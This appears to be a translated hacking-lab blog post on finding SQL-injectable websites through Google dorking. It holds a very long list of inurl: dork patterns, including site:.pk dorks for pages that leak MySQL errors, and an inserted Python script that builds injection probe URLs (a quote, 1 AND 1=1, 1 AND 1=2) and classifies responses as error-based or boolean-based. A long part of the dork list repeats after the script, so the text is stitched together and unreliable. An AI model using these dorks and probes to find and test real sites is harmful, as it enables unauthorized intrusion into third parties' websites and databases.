Hacking 水友攻防实验室: penetration testing, code audit, AV evasion and reverse engineering, hands-on write-ups, practice ranges and target machines.
Contents
Web2: getting a foothold with a SQL injection vulnerability
1. Start with a Google hacking search: inurl:
2. Four targets were left after filtering
4.1 Useful information 1
4.2 Useful information 2
4.3 Useful information 3
Web2: getting a foothold with a SQL injection vulnerability

1. Start with Google hacking. Search for the candidate URL pattern with the inurl: operator (the original writes inurl=, but Google's operator syntax is inurl:), for example:

inurl:english/board/view****.php?code=

A hit only means the page takes a database-looking parameter; it is not yet a vulnerability. Confirm each candidate before counting it as a target (a single quote that produces a database error, or a 1 AND 1=1 / 1 AND 1=2 pair that changes the page), and only against hosts you are authorized to test.

---
title: GoogleHacking - SQL injection
created: '2021-08-24T07:23:40.521Z'
modified: '2021-08-24T07:25:11.440Z'
---
# GoogleHacking - SQL injection
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=
noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
site/products.php?prodid=
page.php?pId=
resources/vulnerabilities_list.php?id=
site.php?id=
products/index.php?rangeid=
global_projects.php?cid=
publications/view.php?id=
display_page.php?id=
pages.php?ID=
lmsrecords_cd.php?cdid=
product.php?prd=
cat/?catid=
products/product-list.php?id=
debate-detail.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
view/7/9628/1.html?reply=
product_details.php?prodid=
catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=
news.php?id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
product-range.php?rangeID=
en/news/fullnews.php?newsid=
deal_coupon.php?cat_id=
show.php?id=
blog/index.php?idBlog=
redaktion/whiteteeth/detail.php?nr=
HistoryStore/pages/item.php?itemID=
aktuelles/veranstaltungen/detail.php?id=
tecdaten/showdetail.php?prodid=
?id=
rating/stat.php?id=
content.php?id=
viewapp.php?id=
item.php?id=
news/newsitem.php?newsID=
FernandFaerie/index.php?c=
show.php?id=
?cat=
categories.php?cat=
category.php?c=
product_info.php?id=
prod.php?cat=
store/product.php?productid=
browsepr.php?pr=
product-list.php?cid=
products.php?cat_id=
product.php?ItemID=
category.php?c=
main.php?id=
article.php?id=
showproduct.php?productId=
view_item.php?item=
skunkworks/content.php?id=
index.php?id=
item_show.php?id=
publications.php?Id=
index.php?t=
view_items.php?id=
portafolio/portafolio.php?id=
YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=
category.php?id_category=
main.php?id=
main.php?id=
calendar/event.php?id=
default.php?cPath=
pages/print.php?id=
index.php?pg_t=
_news/news.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
downloads/shambler.php?id=
sinformer/n/imprimer.php?id=
More_Details.php?id=
directory/contenu.php?id_cat=
properties.php?id_cat=
forum/showProfile.php?id=
downloads/category.php?c=
index.php?cat=
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
detail.php?siteid=
projects/event.php?id=
view_items.php?id=
more_details.php?id=
melbourne_details.php?id=
more_details.php?id=
detail.php?id=
more_details.php?id=
home.php?cat=
idlechat/message.php?id=
detail.php?id=
print.php?sid=
more_details.php?id=
default.php?cPath=
events/event.php?id=
brand.php?id=
toynbeestudios/content.php?id=
show-book.php?id=
more_details.php?id=
store/default.php?cPath=
property.php?id=
product_details.php?id=
more_details.php?id=
view-event.php?id=
content.php?id=
book.php?id=
page/venue.php?id=
print.php?sid=
colourpointeducational/more_details.php?id=
print.php?sid=
browse/book.php?journalID=
section.php?section=
bookDetails.php?id=
profiles/profile.php?profileid=
event.php?id=
gallery.php?id=
category.php?CID=
corporate/newsreleases_more.php?id=
print.php?id=
view_items.php?id=
more_details.php?id=
county-facts/diary/vcsgen.php?id=
idlechat/message.php?id=
podcast/item.php?pid=
products.php?act=
details.php?prodId=
socsci/events/full_details.php?id=
ourblog.php?categoryid=
mall/more.php?ProdID=
archive/get.php?message_id=
review/review_form.php?item_id=
english/publicproducts.php?groupid=
news_and_notices.php?news_id=
rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
products/Blitzball.htm?id=
profile_print.php?id=
questions.php?questionid=
html/scoutnew.php?prodid=
main/index.php?action=
********.php?cid=
********.php?cid=
news.php?type=
index.php?page=
viewthread.php?tid=
summary.php?PID=
news/latest_news.php?cat_id=
index.php?cPath=
category.php?CID=
index.php?pid=
more_details.php?id=
specials.php?osCsid=
search/display.php?BookID=
articles.php?id=
print.php?sid=
page.php?id=
more_details.php?id=
newsite/pdf_show.php?id=
shop/category.php?cat_id=
shopcafe-shop-product.php?bookId=
shop/books_detail.php?bookID=
index.php?cPath=
more_details.php?id=
print.php?sid=
specials.php?osCsid=
store.php?cat_id=
category.php?cid=
displayrange.php?rangeid=
product.php?id=
csc/news-details.php?cat=
products-display-details.php?prodid=
stockists_list.php?area_id=
news/newsitem.php?newsID=
index.php?pid=
newsitem.php?newsid=
category.php?id=
news/newsitem.php?newsID=
details.php?prodId=
publications/publication.php?id=
purelydiamond/products/category.php?cat=
category.php?cid=
product/detail.php?id=
news.php?id=
more_details.php?id=
shop/books_detail.php?bookID=
more_details.php?id=
blog.php?blog=
index.php?pid=
prodotti.php?id_cat=
category.php?CID=
more_details.php?id=
poem_list.php?bookID=
more_details.php?id=
content.php?categoryId=
authorDetails.php?bookID=
press_release.php?id=
item_list.php?cat_id=
colourpointeducational/more_details.php?id=
index.php?pid=
download.php?id=
shop/category.php?cat_id=
i-know/content.php?page=
store/index.php?cat_id=
yacht_search/yacht_view.php?pid=
pharmaxim/category.php?cid=
news/newsitem.php?newsID=
details.php?prodID=
item.php?item_id=
edition.php?area_id=
page.php?area_id=
view_newsletter.php?id=
library.php?cat=
categories.php?cat=
page.php?area_id=
categories.php?cat=
publications.php?id=
item.php?sub_id=
page.php?area_id=
page.php?area_id=
category.php?catid=
content.php?cID=
newsitem.php?newsid=
frontend/category.php?id_category=
news/newsitem.php?newsID=
things-to-do/detail.php?id=
page.php?area_id=
page.php?area_id=
listing.php?cat=
item.php?iid=
customer/home.php?cat=
staff/publications.php?sn=
news/newsitem.php?newsID=
library.php?cat=
main/index.php?uid=
library.php?cat=
shop/eventshop/product_detail.php?itemid=
news/newsitem.php?newsID=
news/newsitem.php?newsID=
library.php?cat=
FullStory.php?Id=
publications.php?ID=
publications/book_reviews/full_review.php?id=
newsitem.php?newsID=
newsItem.php?newsId=
site/en/list_service.php?cat=
page.php?area_id=
product.php?ProductID=
releases_headlines_details.php?id=
product.php?shopprodid=
product.php?productid=
product.php?product=
product.php?product_id=
productlist.php?id=
product.php?shopprodid=
garden_equipment/pest-weed-control/product.php?pr=
product.php?shopprodid=
browsepr.php?pr=
productlist.php?id=
kshop/product.php?productid=
product.php?pid=
showproduct.php?prodid=
product.php?productid=
productlist.php?id=
index.php?pageId=
productlist.php?tid=
product-list.php?id=
onlinesales/product.php?product_id=
garden_equipment/Fruit-Cage/product.php?pr=
product.php?shopprodid=
product_info.php?products_id=
productlist.php?tid=
showsub.php?id=
productlist.php?fid=
products.php?cat=
products.php?cat=
product-list.php?id=
product.php?sku=
store/product.php?productid=
products.php?cat=
productList.php?cat=
product_detail.php?product_id=
product.php?pid=
wiki/pmwiki.php?page****=
summary.php?PID=
productlist.php?grpid=
cart/product.php?productid=
db/CART/product_details.php?product_id=
ProductList.php?id=
products/product.php?id=
product.php?shopprodid=
product_info.php?products_id=
product_ranges_view.php?ID=
cei/cedb/projdetail.php?projID=
products.php?DepartmentID=
product.php?shopprodid=
product.php?shopprodid=
product_info.php?products_id=
index.php?news=
education/content.php?page=
Interior/productlist.php?id=
products.php?categoryID=
modules.php?****=
message/comment_threads.php?postID=
artist_art.php?id=
products.php?cat=
index.php?option=
ov_tv.php?item=
index.php?lang=
showproduct.php?cat=
index.php?lang=
product.php?bid=
product.php?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.php?lid=
?pagerequested=
downloads.php?id=
print.php?sid=
print.php?sid=
product.php?intProductID=
productList.php?id=
product.php?intProductID=
more_details.php?id=
more_details.php?id=
books.php?id=
index.php?offs=
mboard/replies.php?parent_id=
Computer Science.php?id=
news.php?id=
pdf_post.php?ID=
reviews.php?id=
art.php?id=
prod.php?cat=
event_info.php?p=
view_items.php?id=
home.php?cat=
item_book.php?CAT=
www/index.php?page=
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?T****=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
english/board/view****.php?code=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=
view_items.php?id=
index.php?pagina=
product.php?prodid=
notify/notify_form.php?topic_id=
php/index.php?id=
content.php?cid=
product.php?product_id=
constructies/product.php?id=
detail.php?id=
php/index.php?id=
index.php?section=
product.php?****=
show_bug.cgi?id=
detail.php?id=
bookpage.php?id=
product.php?id=
today.php?eventid=
main.php?item=
index.php?cPath=
news.php?id=
event.php?id=
print.php?sid=
news/news.php?id=
module/range/dutch_windmill_collection.php?rangeId=
print.php?sid=
show_bug.cgi?id=
product_details.php?product_id=
products.php?groupid=
projdetails.php?id=
product.php?productid=
products.php?catid=
product.php?product_id=
product.php?prodid=
product.php?prodid=
newsitem.php?newsID=
newsitem.php?newsid=
profile.php?id=
********s_in_area.php?area_id=
productlist.php?id=
productsview.php?proid=
rss.php?cat=
pub/pds/pds_view.php?start=
products.php?rub=
ogloszenia/rss.php?cat=
print.php?sid=
product.php?id=
print.php?sid=
magazin.php?cid=
galerie.php?cid=
www/index.php?page=
view.php?id=
content.php?id=
board/read.php?tid=
product.php?id_h=
news.php?id=
index.php?book=
products.php?act=
reply.php?id=
stat.php?id=
products.php?cat_id=
free_board/board_view.html?page=
item.php?id=
view_items.php?id=
main.php?prodID=
gb/comment.php?gb_id=
gb/comment.php?gb_id=
classifieds/showproduct.php?product=
view.php?pageNum_rscomp=
cart/addToCart.php?cid=
content/pages/index.php?id_cat=
content.php?id
display.php?ID=
display.php?ID=
ponuky/item_show.php?ID=
default.php?cPath=
main/magpreview.php?id=
***zine/board.php?board=
content.php?arti_id=
mall/more.php?ProdID=
product.php?cat=
news.php?id=
content/view.php?id=
content.php?id=
index.php?action=
board_view.php?s_board_id=
KM/BOARD/readboard.php?id=
board_view.html?id=
content.php?cont_title=
category.php?catid=
mall/more.php?ProdID=
publications.php?id=
irbeautina/product_detail.php?product_id=
print.php?sid=
index_en.php?id=
bid/topic.php?TopicID=
news_content.php?CategoryID=
front/bin/forumview.phtml?bbcode=
cat.php?cat_id=
stat.php?id=
veranstaltungen/detail.php?id=
more_details.php?id=
english/print.php?id=
print.php?id=
view_item.php?id=
content/conference_register.php?ID=
rss/event.php?id=
event.php?id=
main.php?id=
rtfe.php?siteid=
category.php?cid=
classifieds/detail.php?siteid=
tools/print.php?id=
channel/channel-layout.php?objId=
content.php?id=
resources/detail.php?id=
more_details.php?id=
detail.php?id=
view_items.php?id=
content/programme.php?ID=
detail.php?id=
default.php?cPath=
more_details.php?id=
content.php?id=
view_items.php?id=
default.php?cPath=
book.php?id=
view_items.php?id=
products/parts/detail.php?id=
category.php?cid=
book.html?isbn=
view_item.php?id=
picgallery/category.php?cid=
detail.php?id=
print.php?sid=
displayArticleB.php?id=
knowledge_base/detail.php?id=
bpac/calendar/event.php?id=
mb_showtopic.php?topic_id=
pages.php?id=
content.php?id=
exhibition_overview.php?id=
singer/detail.php?siteid=
Category.php?cid=
detail.php?id=
print.php?sid=
category.php?cid=
more_detail.php?X_EID=
book.php?ISBN=
view_items.php?id=
category.php?cid=
htmlpage.php?id=
story.php?id=
tools/print.php?id=
print.php?sid=
php/event.php?id=
print.php?sid=
articlecategory.php?id=
print.php?sid=
ibp.php?ISBN=
club.php?cid=
view_items.php?id=
aboutchiangmai/details.php?id=
view_items.php?id=
book.php?isbn=
blog_detail.php?id=
event.php?id=
default.php?cPath=
product_info.php?products_id=
shop_display_products.php?cat_id=
print.php?sid=
modules/content/index.php?id=
printcards.php?ID=
events/event.php?ID=
more_details.php?id=
default.php?TID=
general.php?id=
detail.php?id=
event.php?id=
referral/detail.php?siteid=
view_items.php?id=
event.php?id=
view_items.php?id=
category.php?id=
cemetery.php?id=
index.php?cid=
content.php?id=
exhibitions/detail.php?id=
bookview.php?id=
edatabase/home.php?cat=
view_items.php?id=
store/view_items.php?id=
print.php?sid=
events/event_detail.php?id=
view_items.php?id=
detail.php?id=
pages/video.php?id=
about_us.php?id=
recipe/category.php?cid=
view_item.php?id=
en/main.php?id=
print.php?sid=
More_Details.php?id=
category.php?cid=
home.php?cat=
article.php?id=
page.php?id=
print-story.php?id=
psychology/people/detail.php?id=
print.php?sid=
print.php?ID=
article_preview.php?id=
Pages/whichArticle.php?id=
view_items.php?id=
Sales/view_item.php?id=
book.php?isbn=
knowledge_base/detail.php?id=
gallery/gallery.php?id=
event.php?id=
detail.php?id=
store/home.php?cat=
view_items.php?id=
detail.php?ID=
event_details.php?id=
detailedbook.php?isbn=
fatcat/home.php?view=
events/index.php?id=
static.php?id=
answer/default.php?pollID=
news/detail.php?id=
view_items.php?id=
events/unique_event.php?ID=
gallery/detail.php?ID=
print.php?sid=
view_items.php?id=
board/showthread.php?t=
book.php?id=
event.php?id=
more_detail.php?id=
knowledge_base/detail.php?id=
html/print.php?sid=
index.php?id=
content.php?ID=
Shop/home.php?cat=
store/home.php?cat=
print.php?sid=
gallery.php?id=
resources/index.php?cat=
events/event.php?id=
view_items.php?id=
default.php?cPath=
content.php?id=
products/products.php?p=
auction/item.php?id=
products.php?cat=
clan_page.php?cid=
product.php?sku=
item.php?id=
events?id=
comments.php?id=
products/?catID=
modules.php?****=
fshstatistic/index.php?PID=
products/products.php?p=
sport.php?revista=
products.php?p=
products.php?openparent=
home.php?cat=
news/shownewsarticle.php?articleid=
discussions/10/9/?CategoryID=
trailer.php?id=
news.php?id=
?page=
index.php?page=
item/detail.php?num=
features/view.php?id=
site/?details&prodid=
product_info.php?products_id=
remixer.php?id=
proddetails_print.php?prodid=
pylones/item.php?item=
index.php?cont=
product.php?ItemId=
video.php?id=
detail.php?item_id=
filemanager.php?delete=
news/newsletter.php?id=
shop/home.php?cat=
designcenter/item.php?id=
board/kboard.php?board=
index.php?id=
board/view_temp.php?table=
magazine-details.php?magid=
site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & "id"
site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & "id"
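Step 1 of the write-up (turn a dork into an inurl: search) and the last two dorks above (pages that leak mysql_* warnings) are the two ends of the same check: find pages that take a database-looking parameter, then see whether a probe value reaches the query. The script below is an added example, not code from the post: it parses lines in this list's format, builds the Google query, rewrites the target parameter of a search hit into three probe values, and classifies the response bodies. The sample dork lines, the example.com hit URL and the response bodies are all constructed here; nothing is fetched from the network, and the classifier is the triage a tester would apply to responses collected by hand.

```python
"""Added example, not code from the original post: dork list -> Google
'inurl:' queries -> probe URLs for one hit -> triage of the responses.
Every URL, dork line and response body below is constructed for the
example; nothing is fetched from the network."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# A few lines in the page's own format, including the '</br>' HTML debris
# the page carries and a dork that the debris split in two. Constructed.
SAMPLE_DORKS = """\
product.php?id=</br>
news.php?id=</br>
catalog/main.php?cat_id=</br>
productlist.php?ViewType=</br>Category&CategoryID=</br>
addcart.php?
shopthanks.php</br>
"""


def parse_dorks(text):
    """Return (dork, param) pairs; param is the last 'name=' in the query.
    Lines with no named query parameter offer nothing to inject into from
    the URL, so they are skipped."""
    pairs = []
    for line in text.splitlines():
        dork = line.replace("</br>", "").strip()
        if "?" not in dork:
            continue
        names = re.findall(r"([A-Za-z_]\w*)=", dork.partition("?")[2])
        if names:
            pairs.append((dork, names[-1]))
    return pairs


def google_query(dork, site=None):
    """The search the post's step 1 runs. Google's operator is 'inurl:'
    (the post writes 'inurl='); quoting keeps '?' and '=' literal."""
    query = f'inurl:"{dork}"'
    return f"site:{site} {query}" if site else query


# Probe values for one parameter: a quote to provoke a database error, and a
# boolean pair whose responses differ only if the predicate reaches the query.
PROBES = {"error": "'", "true": "1 AND 1=1", "false": "1 AND 1=2"}


def probe_urls(hit_url, param):
    """Rewrite `param` in a search hit to each probe value; the other
    parameters are kept so the page still renders its normal content."""
    parts = urlsplit(hit_url)
    base = dict(parse_qsl(parts.query, keep_blank_values=True))
    urls = {}
    for label, payload in PROBES.items():
        query = dict(base, **{param: payload})
        urls[label] = urlunsplit(parts._replace(query=urlencode(query)))
    return urls


# The warning text the page's last two dorks search for, plus MySQL's generic
# syntax error: any of these in a response means the probe reached the query.
DB_ERROR_RE = re.compile(
    r"Warning: mysql_\w+\(\): supplied argument is not a valid MySQL result"
    r"|You have an error in your SQL syntax",
    re.IGNORECASE,
)


def classify(baseline, responses):
    """Triage one hit. `baseline` is the untouched page; `responses` maps the
    PROBES labels to the bodies they returned. The error signature is checked
    first because it is unambiguous. Boolean-based requires the 'true' body to
    equal the baseline AND the 'false' body to differ, which rules out a page
    that simply rejects any non-numeric value (both probes would then differ)."""
    if DB_ERROR_RE.search(responses.get("error", "")):
        return "error-based"
    if responses.get("true") == baseline and responses.get("false") != baseline:
        return "boolean-based"
    return None


# Constructed bodies for one hit: an old mysql_* PHP page that leaks a warning
# on a broken query and renders empty fields when the predicate is false.
SAMPLE_RESPONSES = {
    "baseline": "<h1>Widget</h1><p>Price 9.99</p>",
    "error": ("Warning: mysql_fetch_array(): supplied argument is not a valid "
              "MySQL result resource in /var/www/product.php on line 12"),
    "true": "<h1>Widget</h1><p>Price 9.99</p>",
    "false": "<h1></h1><p></p>",
}


def run_demo():
    """Walk the three steps on the constructed input; returns the verdict."""
    for dork, _param in parse_dorks(SAMPLE_DORKS):
        print(google_query(dork, site="example.com"))
    hit = "http://example.com/product.php?id=7&lang=en"  # constructed hit
    for label, url in probe_urls(hit, "id").items():
        print(label, url)
    verdict = classify(SAMPLE_RESPONSES["baseline"], SAMPLE_RESPONSES)
    print("verdict:", verdict)
    return verdict


if __name__ == "__main__":
    run_demo()
```

The boolean check needs a stable baseline: fetch the untouched page twice first, and if the two copies differ (timestamps, ads, session tokens) strip or ignore those regions before comparing, otherwise every candidate looks "boolean-based".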
catalog/main.php?cat_id=</br>
category.php?catid=</br>
categories.php?cat=</br>
categories.php?cat=</br>
detail.php?prodID=</br>
detail.php?id=</br>
category.php?id=</br>
hm/inside.php?id=</br>
index.php?area_id=</br>
gallery.php?id=</br>
products.php?cat=</br>
products.php?cat=</br>
media/pr.php?id=</br>
books/book.php?proj_nr=</br>
products/card.php?prodID=</br>
general.php?id=</br>
news.php?t=</br>
usb/devices/showdev.php?id=</br>
content/detail.php?id=</br>
templet.php?acticle_id=</br>
news/news/title_show.php?id=</br>
product.php?id=</br>
index.php?url=</br>
cryolab/content.php?cid=</br>
ls.php?id=</br>
s.php?w=</br>
abroad/page.php?cid=</br>
bayer/dtnews.php?id=</br>
news/temp.php?id=</br>
index.php?url=</br>
book/bookcover.php?bookid=</br>
index.php/en/component/pvm/?view=</br>
product/list.php?pid=</br>
cats.php?cat=</br>
software_categories.php?cat_id=</br>
print.php?sid=</br>
docDetail.aspx?chnum=</br>
index.php?section=</br>
index.php?page=</br>
index.php?page=</br>
en/publications.php?id=</br>
events/detail.php?ID=</br>
forum/profile.php?id=</br>
media/pr.php?id=</br>
content.php?ID=</br>
cloudbank/detail.php?ID=</br>
pages.php?id=</br>
news.php?id=</br>
beitrag_D.php?id=</br>
content/index.php?id=</br>
index.php?i=</br>
?action=</br>
index.php?page=</br>
beitrag_F.php?id=</br>
index.php?pageid=</br>
page.php?modul=</br>
detail.php?id=</br>
index.php?w=</br>
index.php?modus=</br>
news.php?id=</br>
news.php?id=</br>
aktuelles/meldungen-detail.php?id=</br>
item.php?id=</br>
obio/detail.php?id=</br>
page/de/produkte/produkte.php?prodID=</br>
packages_display.php?ref=</br>
shop/index.php?cPath=</br>
modules.php?bookid=</br>
product-range.php?rangeID=</br>
en/news/fullnews.php?newsid=</br>
deal_coupon.php?cat_id=</br>
show.php?id=</br>
blog/index.php?idBlog=</br>
redaktion/whiteteeth/detail.php?nr=</br>
HistoryStore/pages/item.php?itemID=</br>
aktuelles/veranstaltungen/detail.php?id=</br>
tecdaten/showdetail.php?prodid=</br>
?id=</br>
rating/stat.php?id=</br>
content.php?id=</br>
viewapp.php?id=</br>
item.php?id=</br>
news/newsitem.php?newsID=</br>
FernandFaerie/index.php?c=</br>
show.php?id=</br>
?cat=</br>
categories.php?cat=</br>
category.php?c=</br>
product_info.php?id=</br>
prod.php?cat=</br>
store/product.php?productid=</br>
browsepr.php?pr=</br>
product-list.php?cid=</br>
products.php?cat_id=</br>
product.php?ItemID=</br>
category.php?c=</br>
main.php?id=</br>
article.php?id=</br>
showproduct.php?productId=</br>
view_item.php?item=</br>
skunkworks/content.php?id=</br>
index.php?id=</br>
item_show.php?id=</br>
publications.php?Id=</br>
index.php?t=</br>
view_items.php?id=</br>
portafolio/portafolio.php?id=</br>
YZboard/view.php?id=</br>
index_en.php?ref=</br>
index_en.php?ref=</br>
category.php?id_category=</br>
main.php?id=</br>
main.php?id=</br>
calendar/event.php?id=</br>
default.php?cPath=</br>
pages/print.php?id=</br>
index.php?pg_t=</br>
_news/news.php?id=</br>
forum/showProfile.php?id=</br>
fr/commande-liste-categorie.php?panier=</br>
downloads/shambler.php?id=</br>
sinformer/n/imprimer.php?id=</br>
More_Details.php?id=</br>
directory/contenu.php?id_cat=</br>
properties.php?id_cat=</br>
forum/showProfile.php?id=</br>
downloads/category.php?c=</br>
index.php?cat=</br>
product_info.php?products_id=</br>
product_info.php?products_id=</br>
product-list.php?category_id=</br>
detail.php?siteid=</br>
projects/event.php?id=</br>
view_items.php?id=</br>
more_details.php?id=</br>
melbourne_details.php?id=</br>
more_details.php?id=</br>
detail.php?id=</br>
more_details.php?id=</br>
home.php?cat=</br>
idlechat/message.php?id=</br>
detail.php?id=</br>
print.php?sid=</br>
more_details.php?id=</br>
default.php?cPath=</br>
events/event.php?id=</br>
brand.php?id=</br>
toynbeestudios/content.php?id=</br>
show-book.php?id=</br>
more_details.php?id=</br>
store/default.php?cPath=</br>
property.php?id=</br>
product_details.php?id=</br>
more_details.php?id=</br>
view-event.php?id=</br>
content.php?id=</br>
book.php?id=</br>
page/venue.php?id=</br>
print.php?sid=</br>
colourpointeducational/more_details.php?id=</br>
print.php?sid=</br>
